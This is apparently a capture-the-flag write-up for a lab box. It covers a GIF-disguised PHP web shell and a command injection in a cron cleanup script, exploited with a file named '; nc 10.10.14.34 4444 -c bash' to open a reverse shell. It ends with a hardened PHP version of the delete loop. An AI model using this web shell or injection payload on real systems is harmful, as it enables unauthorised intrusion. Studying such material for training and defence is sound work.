Exploitation
Executing Code
GIF87a
<?php system($_GET['cmd']); ?>


Reverse Shell


Privilege Escalation
Found crontab


Since we cannot write into these files, let's read check_attack.php:
bash-4.2$ cat check_attack.php
<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";
$files = array();
$files = preg_grep('/^([^.])/', scandir($path));
foreach ($files as $key => $value) {
    $msg='';
    if ($value == 'index.html') {
        continue;
    }
    #echo "-------------\n";
    #print "check: $value\n";
    list ($name,$ext) = getnameCheck($value);
    $check = check_ip($name,$value);
    if (!($check[0])) {
        echo "attack!\n";
        # todo: attach file
        file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);
        exec("rm -f $logpath");
        exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
        echo "rm -f $path$value\n";
        mail($to, $msg, $msg, $headers, "-F$value");
    }
}
?>
Analyzing this script: it checks for files that aren't supposed to be in the uploads directory and deletes them. But pay attention to how it deletes the files: it appends the file name to the rm command without any filtering, which makes it vulnerable to command injection.
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
$path is the value of the upload directory
$path = '/var/www/html/uploads/';
$value is the suspicious file's name
By going into /var/www/html/uploads, we can create a file that holds the payload in its name. If we start the file name with a ; semicolon, it will end the rm command and execute whatever code we put after it.

touch '; nc 10.10.14.34 4444 -c bash'
Since the script appends the name of the file, we create the above file with its name beginning with ; nc. The semicolon will end the rm command and execute everything after it.
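For contrast, here is a hardened version of the delete loop, added as an example and not code from the box or the write-up. It never builds a shell command from the file name, so a ; in the name is inert; check_ip_stub() is an assumed stand-in for lib.php's check_ip(), which the page never shows.

```php
<?php
// Added example: hardened replacement for the exec("rm -f $path$value") pattern
// in check_attack.php. Assumption: check_ip() expects the file name (minus
// extension) to be an IP address; check_ip_stub() mimics that interface.

$path = '/var/www/html/uploads/';

// Stub for lib.php's check_ip(): returns [bool ok] like the original call.
function check_ip_stub(string $name): array {
    return [filter_var($name, FILTER_VALIDATE_IP) !== false];
}

// Decide which entries are suspicious; returned as a list so the decision logic
// can be tested without touching the filesystem.
function suspicious_uploads(array $entries): array {
    $doomed = [];
    foreach ($entries as $value) {
        if ($value === 'index.html' || $value === '.' || $value === '..') {
            continue;
        }
        // Anything that is not a plain file name (path separators, NUL bytes)
        // is treated as suspicious; no shell metacharacter filtering is needed
        // because the name is never interpolated into a command.
        if ($value !== basename($value) || strpos($value, "\0") !== false) {
            $doomed[] = $value;
            continue;
        }
        $name = pathinfo($value, PATHINFO_FILENAME);
        if (!check_ip_stub($name)[0]) {
            $doomed[] = $value;
        }
    }
    return $doomed;
}

// Delete via unlink() after confirming the path resolves inside $path.
function remove_upload(string $path, string $value): bool {
    $real = realpath($path . basename($value));
    $base = realpath($path);
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;   // refuse anything outside the uploads directory
    }
    return unlink($real);   // no shell involved, so "; nc ..." is just a file name
}

// If a shell command were unavoidable, the name must be quoted as ONE argument:
//   exec('nohup /bin/rm -f ' . escapeshellarg($path . $value) . ' > /dev/null 2>&1 &');
foreach (suspicious_uploads(scandir($path) ?: []) as $f) {
    remove_upload($path, $f);
}
```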